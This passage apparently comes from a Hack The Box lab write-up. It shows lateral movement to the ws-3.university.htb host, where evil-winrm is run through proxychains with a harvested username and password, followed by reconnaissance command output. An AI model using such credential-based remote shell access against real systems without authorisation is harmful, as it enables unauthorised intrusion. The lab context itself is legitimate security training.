WinRM
During pivoting, the ws-3.university.htb host has been identified to have port 5985 open, running a WinRM service
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ sudo proxychains4 -q evil-winrm -i ws-3.university.htb -u wao -p 'WebAO1337'
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\wao\Documents> whoami
university\wao
*Evil-WinRM* PS C:\Users\wao\Documents> hostname
WS-3
*Evil-WinRM* PS C:\Users\wao\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 3:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::349:6988:18c6:65c6%8
IPv4 Address. . . . . . . . . . . : 192.168.99.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Lateral Movement made to the ws-3.university.htb host as the wao user via WinRM pivoting.
Initial Foothold established to the ws-3.university.htb host.